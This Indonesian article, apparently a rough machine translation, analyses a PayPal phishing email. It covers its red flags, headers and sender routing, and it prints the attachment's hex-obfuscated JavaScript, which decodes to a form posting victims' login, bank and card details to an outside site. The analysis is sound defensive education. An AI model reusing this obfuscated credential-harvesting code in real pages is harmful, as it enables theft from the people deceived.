10Sep
Di dunia sekarang dimana informasi semua orang online, phishing adalah salah satu serangan online yang paling populer dan menghancurkan, karena Anda selalu dapat membersihkan virus, namun jika detail perbankan Anda dicuri, Anda bermasalah. Berikut adalah rincian salah satu serangan yang kami terima.
Jangan berpikir bahwa itu hanya rincian perbankan Anda yang penting: bagaimanapun juga, jika seseorang mendapatkan kontrol atas login akun Anda, mereka tidak hanya mengetahui informasi yang terdapat dalam akun itu, namun kemungkinan informasi login yang sama dapat digunakan pada berbagaiakun lainnyaDan jika mereka mengkompromikan akun email Anda, mereka dapat mengatur ulang semua kata kunci Anda yang lain.
Jadi selain menjaga password yang kuat dan bervariasi, Anda harus selalu waspada terhadap email palsu yang menyamar sebagai hal yang nyata. Sementara kebanyakan upaya phishing adalah amatir, ada juga yang cukup meyakinkan sehingga penting untuk memahami bagaimana mengenali mereka di permukaan dan juga bagaimana mereka bekerja di bawah tenda.
Gambar oleh asirap
Memeriksa Apa yang ada di Plain Sight
Contoh email kami, seperti kebanyakan upaya phishing, "memberitahukan" aktivitas Anda di akun PayPal Anda yang dalam keadaan normal akan mengkhawatirkan. Jadi ajakan bertindak adalah untuk memverifikasi / mengembalikan akun Anda dengan mengirimkan hampir semua informasi pribadi yang dapat Anda pikirkan. Sekali lagi, ini cukup formula.
Meskipun pasti ada pengecualian, hampir setiap phishing dan email penipuan dimuat dengan bendera merah langsung di pesan itu sendiri. Sekalipun teksnya meyakinkan, Anda biasanya bisa menemukan banyak kesalahan yang dikotori seluruh isi pesan yang menunjukkan pesannya tidak legit.
Message Body
Sekilas, ini adalah salah satu email phishing yang lebih baik yang pernah saya lihat. Tidak ada kesalahan ejaan atau tatabahasa dan kata-kata tersebut berbunyi sesuai dengan apa yang Anda harapkan. Namun, ada beberapa bendera merah yang bisa Anda lihat saat Anda memeriksa konten sedikit lebih dekat.
- "Paypal" - Kasus yang benar adalah "PayPal"( modal P).Anda dapat melihat kedua variasi tersebut digunakan dalam pesan. Perusahaan sangat disengaja dengan merek mereka, sehingga diragukan hal seperti ini akan melewati proses pemeriksaan.
- "memungkinkan ActiveX" - Sudah berapa kali Anda melihat bisnis berbasis web legit ukuran Paypal menggunakan komponen berpemilik yang hanya berfungsi pada satu browser saja, terutama bila mereka mendukung banyak browser? Tentu, di suatu tempat di luar sana beberapa perusahaan melakukannya, tapi ini adalah bendera merah.
- "dengan aman." - Perhatikan bagaimana kata ini tidak berbaris di margin dengan teks paragraf lainnya. Bahkan jika saya meregangkan jendela sedikit lebih, itu tidak membungkus atau ruang dengan benar.
- "Paypal!" - Ruang sebelum tanda seru terlihat canggung. Hanya permainan kata-kata lain yang saya yakin tidak akan di email legit.
- "Form Update Akun PayPal.pdf.htm" - Mengapa Paypal melampirkan "PDF" terutama bila mereka bisa menautkan ke halaman di situs mereka? Selain itu, mengapa mereka mencoba menyamarkan file HTML sebagai PDF?Ini adalah bendera merah terbesar dari semuanya.
Header Pesan
Saat Anda melihat header pesan, beberapa bendera merah lagi muncul:
- Alamatnya adalah [email protected].
- Alamat yang hilang. Aku tidak mengosongkan ini, itu hanya bukan bagian dari header pesan standar. Biasanya perusahaan yang memiliki nama Anda akan mempersonalisasi email tersebut kepada Anda.
Lampiran
Saat membuka lampiran, Anda bisa langsung melihat tata letaknya tidak benar karena ada informasi gaya yang hilang. Sekali lagi, mengapa PayPal mengirimkan formulir HTML saat mereka bisa memberi Anda tautan di situs mereka?
Catatan: kami menggunakan penampil lampiran HTML bawaan Gmail untuk ini, namun kami sarankan agar Anda TIDAK MEMBUKA lampiran dari penipu. Tak pernah. Pernah. Mereka sangat sering mengandung eksploitasi yang akan menginstal trojan pada PC Anda untuk mencuri informasi akun Anda.
Menggulir sedikit lagi Anda dapat melihat bahwa formulir ini tidak hanya meminta informasi masuk PayPal kami, namun juga untuk informasi perbankan dan kartu kredit. Beberapa gambar rusak.
Sudah jelas usaha phishing ini mengejar semuanya dengan satu gerakan.
Rincian Teknis
Meskipun seharusnya cukup jelas berdasarkan pada pandangan umum bahwa ini adalah upaya phishing, sekarang kami akan merinci susunan teknis email dan melihat apa yang dapat kami temukan. Informasi
dari Lampiran
Hal pertama yang harus diperhatikan adalah sumber HTML dari bentuk lampiran yang mengirimkan data ke situs palsu.
Saat melihat sumbernya dengan cepat, semua tautan tampak valid karena mengarah ke "paypal.com" atau "paypalobjects.com" yang keduanya legit.
Sekarang kita akan melihat beberapa informasi dasar halaman yang dikumpulkan oleh Firefox di halaman ini.
Seperti yang Anda lihat, beberapa grafis ditarik dari domain "blessedtobe.com", "goodhealthpharmacy.com" dan "pic-upload.de" dan bukan domain PayPal yang legit. Informasi
dari Header Email
Selanjutnya kita akan melihat header pesan email mentah. Gmail membuat ini tersedia melalui opsi menu Tampilkan Asli pada pesan.
Melihat informasi header untuk pesan asli, Anda dapat melihat pesan ini disusun menggunakan Outlook Express 6. Saya ragu PayPal memiliki seseorang di staf yang mengirimkan setiap pesan ini secara manual melalui klien email yang sudah ketinggalan zaman.
Sekarang melihat informasi routing, kita bisa melihat alamat IP dari pengirim dan server surat relaying.
Alamat IP "User" adalah pengirim asli. Dengan melakukan pencarian cepat terhadap informasi IP, kita bisa melihat IP pengirimnya ada di Jerman.
Dan ketika kita melihat relay mail server( mail.itak.at), alamat IP kita bisa lihat ini adalah ISP yang berbasis di Austria. Saya ragu PayPal mengarahkan email mereka secara langsung melalui ISP berbasis Austria saat mereka memiliki peternakan server besar-besaran yang dapat menangani tugas ini dengan mudah.
kemana Data Go?
Jadi, kami telah menentukan dengan jelas bahwa ini adalah email phishing dan mengumpulkan beberapa informasi tentang asal pesan, tapi bagaimana dengan data Anda dikirim?
Untuk melihat ini, pertama kita harus menyimpan lampiran HTM desktop kita dan buka di editor teks. Dengan menggulirnya, segala sesuatunya tampak sesuai, kecuali saat kita sampai ke blok Javascript yang mencurigakan.
Memecah sumber penuh dari blok terakhir Javascript, kita melihat:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Kapan saja Anda melihat string campur aduk yang besar dari huruf dan angka yang tampaknya acak yang disematkan di blok Javascript, biasanya ada yang mencurigakan. Melihat kode, variabel "x" diatur ke string besar ini dan kemudian diterjemahkan ke dalam variabel "y".Hasil akhir dari variabel "y" kemudian ditulis ke dokumen sebagai HTML.
Karena string besar terbuat dari angka 0-9 dan huruf af, itu kemungkinan besar dikodekan melalui ASCII sederhana untuk konversi Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Menerjemahkan ke:
& lt; bentuk nama =”main” id =”main”method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Bukanlah suatu kebetulan bahwa decode ini menjadi tag bentuk HTML yang valid yang mengirimkan hasilnya ke PayPal, tapi ke situs nakal.
Selain itu, saat Anda melihat sumber HTML formulir, Anda akan melihat bahwa tag formulir ini tidak terlihat karena dihasilkan secara dinamis melalui Javascript. Ini adalah cara cerdas untuk menyembunyikan apa yang sebenarnya dilakukan HTML jika seseorang hanya melihat sumber keterikatan yang dihasilkan( seperti yang kita lakukan sebelumnya) sebagai lawan membuka lampiran secara langsung di editor teks.
Menjalankan whois cepat di situs yang menyinggung, kita dapat melihat ini adalah domain yang dihosting di host web populer, 1and1.
Yang menonjol adalah domain menggunakan nama yang mudah dibaca( berlawanan dengan sesuatu seperti "dfh3sjhskjhw.net") dan domainnya telah terdaftar selama 4 tahun. Karena ini, saya yakin domain ini dibajak dan digunakan sebagai pion dalam usaha phishing ini.
Cynicism adalah Pertahanan yang Baik
Ketika datang untuk tetap aman online, tidak ada salahnya untuk memiliki sedikit sinisme.
Sementara saya yakin ada lebih banyak bendera merah di contoh email, yang kami tunjukkan di atas adalah indikator yang kami lihat setelah beberapa menit pemeriksaan. Secara hipotetis, jika tingkat permukaan email meniru mitra sahnya 100%, analisis teknis masih akan mengungkapkan sifat sebenarnya. Inilah sebabnya mengapa impor bisa memeriksa apa yang dapat dan tidak dapat Anda lihat.
